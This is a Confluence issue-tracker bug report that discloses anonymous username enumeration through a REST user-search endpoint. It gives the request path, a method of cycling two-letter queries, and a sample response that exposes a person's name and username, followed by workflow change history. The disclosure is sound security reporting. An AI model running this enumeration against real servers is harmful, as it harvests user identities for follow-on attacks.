Uploaded image for project: 'Confluence Data Center'
  1. Confluence Data Center
  2. CONFSERVER-25322

The vulnerability exists in the standalone and also in the online demonstration enviroment.

      It is possible to anonymously enumerate all usernames via the script at /rest/prototype/1/search/user.json?max-results=10&query=XX. The 'query' GET parameter should contain at least two charakters. It is possible to enumerate all usernames by performing a search from 'query' value 'aa' to 'zz'.


      When the following GET request is made:

      GET /rest/prototype/1/search/user.json?max-results=10&query=si HTTP/1.1
      Host: confluence.atlassian.com
      

      The following answer is given:

      HTTP/1.1 200 OK
      Date: Tue, 24 Apr 2012 13:32:11 GMT
      Cache-Control: no-cache, must-revalidate
      Expires: Thu, 01 Jan 1970 00:00:00 GMT
      Content-Type: application/json
      Keep-Alive: timeout=3, max=20
      Connection: Keep-Alive
      Content-Length: 11707
      
      {"totalSize":846,"result":[{"id":"254738536","type":"user","title":"Harshil Singhal","wikiLink":"[~hs39867]","createdDate":{"friendly":"Aug 22, 2011","date":"2011-08-22T21:52:45-0500"},"creator":{"links":[{"href":"https://confluence.atlassian.com/rest/prototype/1/user/system/anonymous","rel":"self"}],"avatarUrl":"/s/en_GB/3277/16/_/images/icons/profilepics/anonymous.png","anonymous":true,"displayName":"Anonymous"},"lastModifier":{"links":[{"href":"https://confluence.atlassian.com/rest/prototype/1/user/system/anonymous","rel":"self"}],"avatarUrl":"/s/en_GB/3277/16/_/images/icons/profilepics/anonymous.png","anonymous":true,"displayName":"Anonymous"},"username":"hs39867","thumbnailLink":
      [..]

            [CONFSERVER-25322] The vulnerability exists in the standalone and also in the online demonstration enviroment.

            Katherine Yabut made changes -
            Workflow Original: JAC Bug Workflow v3 [ 2875306 ] New: CONFSERVER Bug Workflow v4 [ 3005002 ]
            Owen made changes -
            Workflow Original: JAC Bug Workflow v2 [ 2803288 ] New: JAC Bug Workflow v3 [ 2875306 ]
            Status Original: Resolved [ 5 ] New: Closed [ 6 ]
            Owen made changes -
            Workflow Original: JAC Bug Workflow [ 2735962 ] New: JAC Bug Workflow v2 [ 2803288 ]
            Owen made changes -
            Workflow Original: Confluence Workflow - Public Facing - Restricted v5 - TEMP [ 2389200 ] New: JAC Bug Workflow [ 2735962 ]
            Alex Yakovlev (Inactive) made changes -
            Labels Original: affects-server bugfix cvss-medium loyalty security verified web-interface New: affects-server cvss-medium loyalty security verified web-interface
            Alex Yakovlev (Inactive) made changes -
            Labels Original: affects-server bugfix cvss-medium security verified web-interface New: affects-server bugfix cvss-medium loyalty security verified web-interface
            Katherine Yabut made changes -
            Workflow Original: Confluence Workflow - Public Facing - Restricted v5 [ 2266596 ] New: Confluence Workflow - Public Facing - Restricted v5 - TEMP [ 2389200 ]
            Katherine Yabut made changes -
            Workflow Original: Confluence Workflow - Public Facing - Restricted v5.1 - TEMP [ 2210306 ] New: Confluence Workflow - Public Facing - Restricted v5 [ 2266596 ]
            Katherine Yabut made changes -
            Workflow Original: Confluence Workflow - Public Facing - Restricted v5 - TEMP [ 2196252 ] New: Confluence Workflow - Public Facing - Restricted v5.1 - TEMP [ 2210306 ]
            Katherine Yabut made changes -
            Workflow Original: Confluence Workflow - Public Facing - Restricted v5 [ 1925312 ] New: Confluence Workflow - Public Facing - Restricted v5 - TEMP [ 2196252 ]

              jxie Chii (Inactive)
              6d8aa60d5817 Sijmen Ruwhof
              Affected customers:
              0 This affects my team
              Watchers:
              7 Start watching this issue

                Created:
                Updated:
                Resolved: